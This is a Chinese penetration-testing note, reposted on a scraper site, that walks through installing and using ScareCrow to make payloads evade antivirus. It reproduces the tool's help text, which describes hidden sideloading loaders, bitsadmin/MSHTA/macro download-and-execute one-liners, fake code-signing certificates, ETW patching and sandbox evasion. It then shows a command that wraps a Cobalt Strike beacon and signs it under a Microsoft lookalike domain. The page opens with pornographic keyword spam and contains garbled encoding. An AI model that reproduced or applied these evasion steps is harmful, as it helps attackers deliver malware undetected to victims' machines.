日韩性视频-久久久蜜桃-www中文字幕-在线中文字幕av-亚洲欧美一区二区三区四区-撸久久-香蕉视频一区-久久无码精品丰满人妻-国产高潮av-激情福利社-日韩av网址大全-国产精品久久999-日本五十路在线-性欧美在线-久久99精品波多结衣一区-男女午夜免费视频-黑人极品ⅴideos精品欧美棵-人人妻人人澡人人爽精品欧美一区-日韩一区在线看-欧美a级在线免费观看

歡迎訪問(wèn) 生活随笔!

生活随笔

當(dāng)前位置: 首頁(yè) > 编程资源 > 编程问答 >内容正文

编程问答

【渗透测试笔记】之【免杀工具——ScareCrow】

發(fā)布時(shí)間:2023/12/16 编程问答 35 豆豆
生活随笔 收集整理的這篇文章主要介紹了 【渗透测试笔记】之【免杀工具——ScareCrow】 小編覺(jué)得挺不錯(cuò)的,現(xiàn)在分享給大家,幫大家做個(gè)參考.

項(xiàng)目地址

https://github.com/optiv/ScareCrow

安裝方法

  • 首先安裝:golang、openssl、osslsigncode、mingw-w64
  • apt install golang openssl osslsigncode mingw-w64 -y
  • 下載源碼:https://github.com/optiv/ScareCrow/tags
  • 進(jìn)入根目錄編譯
  • go env -w GOPROXY=https://goproxy.cn # 使用國(guó)內(nèi)原 go build ScareCrow.go # 編譯
  • 查看幫助
  • ./ScareCrow -h _________ _________ / _____/ ____ _____ _______ ____ \_ ___ \_______ ______ _ __\_____ \_/ ___\\__ \\_ __ \_/ __ \/ \ \/\_ __ \/ _ \ \/ \/ // \ \___ / __ \| | \/\ ___/\ \____| | \( <_> ) / /_______ /\___ >____ /__| \___ >\______ /|__| \____/ \/\_/ \/ \/ \/ \/ \/ (@Tyl0us)“Fear, you must understand is more than a mere obstacle. Fear is a TEACHER. the first one you ever had.”Usage of ./ScareCrow:-I stringPath to the raw 64-bit shellcode.-Loader stringSets the type of process that will sideload the malicious payload:[*] binary - Generates a binary based payload. (This type does not benfit from any sideloading) [*] control - Loads a hidden control applet - the process name would be rundll32 if -O is specified a JScript loader will be generated.[*] dll - Generates just a DLL file. Can executed with commands such as rundll32 or regsvr32 with DllRegisterServer, DllGetClassObject as export functions.[*] excel - Loads into a hidden Excel process using a JScript loader.[*] msiexec - Loads into MSIexec process using a JScript loader.[*] wscript - Loads into WScript process using a JScript loader.(default "binary")-O stringName of output file (e.g. loader.js or loader.hta). If Loader is set to dll or binary this option is not required.-configfile stringThe path to a json based configuration file to generate custom file attributes. This will not use the the default ones.-consoleOnly for Binary Payloads - Generates verbose console information when the payload is executed. This will disable the hidden window feature.-delivery stringGenerates a one-liner command to download and execute the payload remotely:[*] bits - Generates a Bitsadmin one liner command to download, execute and remove the loader (Compatible with Binary, Control, Excel and Wscript Loaders).[*] hta - Generates a blank hta file containing the loader along with a MSHTA command execute the loader remotely in the background (Compatible with Control and Excel Loaders). [*] macro - Generates an office macro that will download and execute the loader remotely (Compatible with Control, Excel and Wscript Loaders)-domain stringThe domain name to use for creating a fake code signing cert. (e.g. www.acme.com) -etwEnables ETW patching to prevent ETW events from being generated-injection stringEnables Process Injection Mode and specify the path to the process to create/inject into (use \ for the path).-password stringThe password for code signing cert. Required when -valid is used.-sandboxEnables sandbox evasion using IsDomainedJoined calls.-unmodifiedWhen enabled will generate a DLL loader that WILL NOT removing the EDR hooks in system DLLs and only use custom syscalls (set to false by default)-url stringURL associated with the Delivery option to retrieve the payload. (e.g. https://acme.com/)-valid stringThe path to a valid code signing cert. Used instead -domain if a valid code signing cert is desired.

    基本用法

    使用cs生成64位raw類型payload:

    生成命令:

    ./ScareCrow -I beacon.bin -domain www.microft.com -etw -sandbox # -I:指定raw文件 # -domain:偽造簽名域名 # -etw:防止ETW事件生成 # -sandbox:反沙箱

    上線測(cè)試:

    總結(jié)

    以上是生活随笔為你收集整理的【渗透测试笔记】之【免杀工具——ScareCrow】的全部?jī)?nèi)容,希望文章能夠幫你解決所遇到的問(wèn)題。

    如果覺(jué)得生活随笔網(wǎng)站內(nèi)容還不錯(cuò),歡迎將生活随笔推薦給好友。